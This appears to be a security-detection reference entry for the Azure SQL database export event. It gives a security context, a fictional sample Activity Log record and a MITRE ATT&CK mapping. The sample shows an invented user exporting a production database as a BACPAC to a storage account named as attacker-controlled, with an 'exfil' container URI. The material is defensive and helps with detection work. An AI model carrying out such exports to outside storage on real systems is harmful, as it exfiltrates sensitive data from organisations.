Microsoft.Sql/servers/databases/export/action
Azure
Microsoft.Sql/servers/databases/export/action
Event
Exports an Azure SQL Database to a BACPAC file stored in Azure Blob Storage.
Security Context
- Accessing cloud storage objects can expose sensitive data including backups, configuration files, application data, and customer information.
- Transferring data to external cloud accounts or regions can bypass network-based data loss prevention controls and exfiltrate large volumes of data.
Log Source
Azure Activity Log
Sample Event
draco@fantasticlogs.cloud exports the production database sqldb-occamy-events to a BACPAC stored in an attacker-controlled storage account (flcdracoexfil666.blob.core.windows.net) using a storage SAS. Classic exfil-via-export pattern: the BACPAC is a portable schema + data dump the attacker can pull from their own storage account, even after the source DB is deleted.
{ "authorization": { "action": "Microsoft.Sql/servers/databases/export/action", "scope": "/subscriptions/20000000-0000-4000-8000-000000000001/resourceGroups/rg-occamy-pipeline/providers/Microsoft.Sql/servers/sql-occamy-prod-server/databases/sqldb-occamy-events" }, "caller": "draco@fantasticlogs.cloud", "channels": "Operation", "claims": { "appid": "04b07795-8ddb-461a-bbee-02f9e1bf7b46", "ipaddr": "203.0.113.66", "name": "Draco Malfoy", "http://schemas.microsoft.com/identity/claims/objectidentifier": "30000000-0000-4000-8000-001010011010", "puid": "1003200000000666", "http://schemas.microsoft.com/identity/claims/tenantid": "10000000-0000-4000-8000-000000000001", "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn": "draco@fantasticlogs.cloud", "http://schemas.microsoft.com/identity/claims/wids": "e8611ab8-c189-46e8-94e1-60213ab1f814", "uti": "sqlExp221ExampleUtid01", "ver": "1.0" }, "correlationId": "90000000-0000-4000-8000-000100010000", "description": "", "eventDataId": "90000000-0000-4000-8000-000100010001", "eventName": { "value": "EndRequest", "localizedValue": "End request" }, "category": { "value": "Administrative", "localizedValue": "Administrative" }, "eventTimestamp": "2026-04-15T18:46:11.7218012Z", "id": "/subscriptions/20000000-0000-4000-8000-000000000001/resourceGroups/rg-occamy-pipeline/providers/Microsoft.Sql/servers/sql-occamy-prod-server/databases/sqldb-occamy-events/events/90000000-0000-4000-8000-000100010001/ticks/638798261717218012", "level": "Informational", "operationId": "90000000-0000-4000-8000-000100110101", "operationName": { "value": "Microsoft.Sql/servers/databases/export/action", "localizedValue": "Export SQL Database" }, "resourceGroupName": "rg-occamy-pipeline", "resourceProviderName": { "value": "Microsoft.Sql", "localizedValue": "Microsoft.Sql" }, "resourceType": { "value": "Microsoft.Sql/servers/databases", "localizedValue": "Microsoft.Sql/servers/databases" }, "resourceId": "/subscriptions/20000000-0000-4000-8000-000000000001/resourceGroups/rg-occamy-pipeline/providers/Microsoft.Sql/servers/sql-occamy-prod-server/databases/sqldb-occamy-events", "status": { "value": "Accepted", "localizedValue": "Accepted" }, "subStatus": { "value": "Accepted", "localizedValue": "Accepted (HTTP Status Code: 202)" }, "submissionTimestamp": "2026-04-15T18:46:12.2402185Z", "subscriptionId": "20000000-0000-4000-8000-000000000001", "tenantId": "10000000-0000-4000-8000-000000000001", "properties": { "statusCode": "Accepted", "serviceRequestId": null, "eventCategory": "Administrative", "entity": "/subscriptions/20000000-0000-4000-8000-000000000001/resourceGroups/rg-occamy-pipeline/providers/Microsoft.Sql/servers/sql-occamy-prod-server/databases/sqldb-occamy-events/export", "message": "Microsoft.Sql/servers/databases/export/action", "hierarchy": "10000000-0000-4000-8000-000000000001/20000000-0000-4000-8000-000000000001", "requestbody": "{\"storageKeyType\":\"SharedAccessKey\",\"storageKey\":\"<REDACTED-SAS-TOKEN>\",\"storageUri\":\"https://flcdracoexfil666.blob.core.windows.net/exfil/sqldb-occamy-events.bacpac\",\"administratorLogin\":\"flcadmin\",\"administratorLoginPassword\":\"<REDACTED-PASSWORD>\",\"authenticationType\":\"SQL\"}" }, "relatedEvents": []}MITRE ATT&CK Mapping
Tactics: Exfiltration Collection
Techniques:
- T1537 — Transfer Data to Cloud Account — Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.
- T1530 — Data from Cloud Storage — Adversaries may access data from cloud storage.